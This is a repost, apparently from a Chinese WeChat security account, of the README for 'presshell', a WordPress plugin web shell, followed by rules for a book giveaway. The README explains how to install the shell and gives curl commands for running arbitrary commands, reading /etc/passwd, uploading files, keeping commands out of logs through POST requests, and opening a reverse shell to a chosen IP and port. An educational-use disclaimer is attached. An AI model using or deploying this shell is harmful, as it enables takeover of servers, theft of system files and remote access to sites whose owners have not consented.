在您的 wordpress 服务器上执行 shell 命令。上传的 shell 可能会在
<your-host>/wp-content/plugins/shell/shell.php
安装
要安装 shell,我们假设您拥有 Wordpress 的管理权限并且可以安装插件,因为将 PHP 文件传输到媒体库无论如何都不应该工作。否则,你有一个更大的问题。
只需将位于 Releases 部分的 zip 文件作为新扩展上传,您就可以开始使用了。
用法
使用 shell 很简单。只需将 sh命令作为参数传递给 shell:
curl ' http://host/.../shell.php?cmd=uname+-a '
Linux wordpress-server 2.6.32-21-generic-pae # 32-Ubuntu SMP Fri Apr 16 09:39:35 UTC 2010 i686 GNU/Linux
您也可以在 POST 请求中传递这些参数,这是将命令排除在日志之外的推荐方法。
curl ' http://host/.../shell.php ' --data-urlencode ' cmd=ls ' LICENSE README.md shell.php
还支持更复杂的命令,但请注意您的引用。
curl ' http://host/.../shell.php ' --data-urlencode ' cmd=cat /etc/passwd | grep -v "(false|nologin)" '
root:x:0:0:root:/root:/bin/bash
sync:x:4:65534:sync:/bin:/bin/sync
curl ' http://host/.../shell.php ' --data-urlencode ' cmd=python -c "from urllib.parse import urlencode; print(urlencode({"cmd": "uname -a"}))" '
cmd=uname+-a
您还可以使用ip和port参数打开反向 shell。默认端口是443.
curl ' http://host/.../shell.php ' --data-urlencode ' ip=127.0.0.1 '
curl ' http://host/.../shell.php ' --data-urlencode ' ip=127.0.0.1 ' --data-urlencode ' port=1337 '
curl 'http://host/.../shell.php' -F 'file=@some_file'
curl 'http://host/.../shell.php' --data-urlencode 'cmd=ls'
LICENSE
README.md
shell.php
some_file
对公共或私人服务器进行未经授权的攻击是非法的。此存储库的内容仅用于教育目的,如果不正确使用所提供的材料,作者将不承担任何责任。
项目地址:https://github.com/scheatkode/presshell
粉丝福利
为了感谢大家一直以来的关注与支持,会有四本书籍免费赠送。
书籍介绍:
一:《Web安全攻防从入门到精通》
我们都生活在移动互联网时代,个人信息、企业信息、政府信息都暴露在互联网之下。一旦有居心叵测的人攻破网络,会造成无法估量的损失。《Web安全攻防从入门到精通》结合红日安全团队的多年经验,深入讲解Web安全的相关知识。
规则如下:
1. 转发朋友圈,中奖后转发视为无效。
2. 私聊文末公众号发送“抽奖”即可扫描参与抽奖,注意看是发送暗号“抽奖”。
3. 中奖者不满足条件1,请不要加运营微信兑奖了哦。
4. 活动截止时间10月12日 12:00点,到时候还要中奖者及时联系号主发送你的中奖核验二维码、朋友圈转发截图、收货地址、姓名以及手机号,好给您发送书籍哦!
注:
1. 24小时内未联系号主视为自动放弃!改头像、微信名字等骗书行为出版社将永久拉黑!
2. 未在开奖前将本文转发朋友圈的,中奖是为无效,请不要加运营微信兑奖了哦。
先转发本文到朋友圈,然后私信发送“抽奖” 即可马上扫描参与抽奖
原文始发于微信公众号(橘猫学安全):神兵利器 - presshell【文末赠书-Web安全攻防从入门到精通】
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论